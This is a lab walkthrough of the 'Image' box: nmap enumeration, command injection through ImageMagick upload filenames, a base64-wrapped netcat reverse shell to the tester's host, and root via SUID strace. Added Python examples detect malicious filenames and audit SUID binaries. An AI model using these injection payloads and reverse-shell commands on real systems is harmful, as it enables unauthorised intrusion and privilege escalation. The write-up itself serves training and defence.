root💀n16hth4wk-sec:~#

Hack Enumerate Harder!. Eat. Sleep. Repeat.


First Enumeration with nmap

# Nmap 7.94SVN scan initiated Mon Feb 19 11:40:13 2024 as: nmap -sC -sV -T4 -oN service.nmap -p 80,22 -Pn 192.168.239.178
Nmap scan report for 192.168.239.178
Host is up (0.17s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
|   256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_  256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: ImageMagick Identifier
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Feb 19 11:40:27 2024 -- 1 IP address (1 host up) scanned in 14.60 seconds


A web server is running on port 80; opening it in a browser shows an "ImageMagick Identifier" page, an upload form that identifies image files.


Uploading an image file reveals the ImageMagick version in use: 6.9.6-4.


Searching for exploits against this version turns up an RCE vulnerability: the filename of an uploaded image is handed to ImageMagick unsanitized, so a shell command embedded in the name gets executed when the file is processed.

┌──(n16hth4wk👽n16hth4wk-sec)-[~/Documents/PGP/Image]
└─$ cp ~/Pictures/1.png .
                                                                                                                                                            
┌──(n16hth4wk👽n16hth4wk-sec)-[~/Documents/PGP/Image]
└─$ cp 1.png '|1"`ping 192.168.45.212`".png'

Copy the image to a filename that carries an injected command. ImageMagick treats a filename that starts with `|` as a pipe to a command, and the shell it spawns expands the backticked `ping` to our host, so we get a ping back if the injection works.
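From the defender's side, the fix for this class of bug is to never let a client-supplied filename reach ImageMagick's command line, and the detection is to look for filenames that contain pipe, backtick or quote characters in the upload log. The following is an added example (not code from this write-up or from the ImageMagick project): `safe_storage_name` shows what the upload handler should have done, `is_suspicious_filename` flags names like the one used above, and the JSON-lines upload log it scans is constructed here for illustration. The allowed-extension list is an assumed policy.

```python
import json
import os
import re
import secrets

# Extensions the upload handler is willing to accept (assumed policy for this example).
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}

# Characters that mean something to ImageMagick's filename parser (a leading '|' selects a
# command pipe) or to the shell that pipe is run through: backticks, $(...), quotes, ; & < > and newlines.
SHELL_META = re.compile(r'[|`$;&<>"\'\\\n\r]')

# The filename used in this write-up, kept here as the positive test case.
PAYLOAD_NAME = '|1"`ping 192.168.45.212`".png'


def is_suspicious_filename(name: str) -> bool:
    """True if an uploaded filename could be interpreted as a command by ImageMagick
    (leading '|') or by the shell ImageMagick hands such a name to."""
    if name.startswith("|"):
        return True
    return SHELL_META.search(name) is not None


def is_accepted_extension(user_filename: str) -> bool:
    """Allowlist check on the extension only; the rest of the name is never trusted."""
    return os.path.splitext(user_filename)[1].lower() in ALLOWED_EXTENSIONS


def safe_storage_name(user_filename: str) -> str:
    """Generate the stored basename server-side and keep only an allowlisted extension, so
    nothing attacker-controlled ends up on ImageMagick's command line."""
    if not is_accepted_extension(user_filename):
        raise ValueError("file extension not allowed")
    ext = os.path.splitext(user_filename)[1].lower()
    return secrets.token_hex(16) + ext


def flag_suspicious_uploads(log_lines):
    """Detection over a JSON-lines upload log: return (client, filename) pairs whose
    filename looks like a command-injection attempt against the image processor."""
    hits = []
    for line in log_lines:
        rec = json.loads(line)
        if is_suspicious_filename(rec["filename"]):
            hits.append((rec["client"], rec["filename"]))
    return hits


# Constructed sample upload log: one benign upload and one carrying the payload above.
SAMPLE_UPLOAD_LOG = [
    json.dumps({"ts": "2024-02-19T11:52:03Z", "client": "192.168.45.212", "filename": "1.png"}),
    json.dumps({"ts": "2024-02-19T11:53:41Z", "client": "192.168.45.212", "filename": PAYLOAD_NAME}),
]

if __name__ == "__main__":
    for client, fname in flag_suspicious_uploads(SAMPLE_UPLOAD_LOG):
        print(f"suspicious upload from {client}: {fname!r}")
    print("stored as:", safe_storage_name("1.png"))
```

With the storage-name approach the original filename can still be kept in a database column for display; it just never becomes an argument to `identify` or `convert`.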


Upload the modified image.


We got a ping back, which confirms command execution, so let's spawn a reverse shell.

#base64 encode payload
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.212 80 >/tmp/f

cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDE5Mi4xNjguNDUuMjEyIDgwID4vdG1wL2Y=

┌──(n16hth4wk👽n16hth4wk-sec)-[~/Documents/PGP/Image]
└─$ cp 1.png '|1"`echo cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDE5Mi4xNjguNDUuMjEyIDgwID4vdG1wL2Y= | base64 -d|bash`".png'

First we base64-encode the reverse shell payload and embed the decode-and-run in the filename, then fire up an ncat listener on port 80.


Uploaded the image.

┌──(n16hth4wk👽n16hth4wk-sec)-[~/Documents/PGP/Image]
└─$ ncat -lnvp 80                                                
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from 192.168.239.178:55626.
sh: 0: can't access tty; job control turned off
$ whoami 
www-data
$

Checking back on the listener, we have a reverse shell as www-data.

Privilege Escalation

www-data@image:/var/www/html$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/strace
/usr/bin/fusermount                                                           
/usr/bin/sudo               
/usr/bin/su                      
/usr/bin/umount                                                               
/usr/bin/passwd            
/usr/bin/chsh                 
/usr/bin/chfn                 
/usr/bin/at                      
/usr/bin/mount                 
/usr/bin/newgrp                 
/usr/bin/gpasswd                
/usr/bin/pkexec             
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign    
/usr/lib/eject/dmcrypt-get-device
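A periodic SUID inventory compared against a known-good baseline is the defensive counterpart of the enumeration above: every binary in this list except `/usr/bin/strace` ships SUID on a stock Ubuntu 20.04 install, so a baseline diff would have flagged it the day it appeared. The following is an added example, not part of the original write-up. The baseline set is my assumption of a stock install (derive yours from a freshly installed reference host); the sample input is the `find` output shown above, and `live_suid_paths` walks the local filesystem the same way `find -perm -u=s` does.

```python
import os
import stat

# Assumed baseline of SUID binaries on a stock Ubuntu 20.04 host. Build your own from a
# clean reference system rather than trusting this list.
EXPECTED_SUID = frozenset({
    "/usr/bin/fusermount", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/umount",
    "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/at",
    "/usr/bin/mount", "/usr/bin/newgrp", "/usr/bin/gpasswd", "/usr/bin/pkexec",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device",
})

# The find output from the target, as shown in the write-up.
SAMPLE_FIND_OUTPUT = """
/usr/bin/strace
/usr/bin/fusermount
/usr/bin/sudo
/usr/bin/su
/usr/bin/umount
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/at
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
"""


def parse_find_output(text: str):
    """Turn `find / -perm -u=s -type f` output into a clean list of paths."""
    return [line.strip() for line in text.splitlines() if line.strip()]


def unexpected_suid(paths, baseline=EXPECTED_SUID):
    """Paths that are SUID on this host but absent from the baseline: review each one."""
    return sorted(set(paths) - baseline)


def missing_suid(paths, baseline=EXPECTED_SUID):
    """Baseline entries that are no longer SUID; usually harmless but worth knowing."""
    return sorted(baseline - set(paths))


def live_suid_paths(root="/"):
    """Walk the filesystem and return regular files with the SUID bit set, skipping
    directories we cannot read (the same result set as the find command above)."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda e: None):
        for fname in filenames:
            path = os.path.join(dirpath, fname)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return found


if __name__ == "__main__":
    # Audit the live host; swap in parse_find_output(...) to audit captured output instead.
    for path in unexpected_suid(live_suid_paths()):
        print("unexpected SUID binary:", path)
```

Run from cron or a configuration-management check, the unexpected list should normally be empty; a debugger such as strace showing up in it is exactly the kind of misconfiguration that turns a web shell into root.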

Looking through the SUID binaries, /usr/bin/strace stands out: it is not SUID on a stock system. Let's abuse this.


GTFOBins lists the SUID abuse for strace.

www-data@image:/var/www/html$ /usr/bin/strace -o /dev/null /bin/bash -p 
bash-5.0# whoami 
root
bash-5.0# id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
bash-5.0# 

Running bash through the SUID strace gives us a root shell; the `-p` flag stops bash from dropping the effective uid of 0, which is why `id` shows uid=33 but euid=0(root).


And we are through. 🙂 Easy, yeah?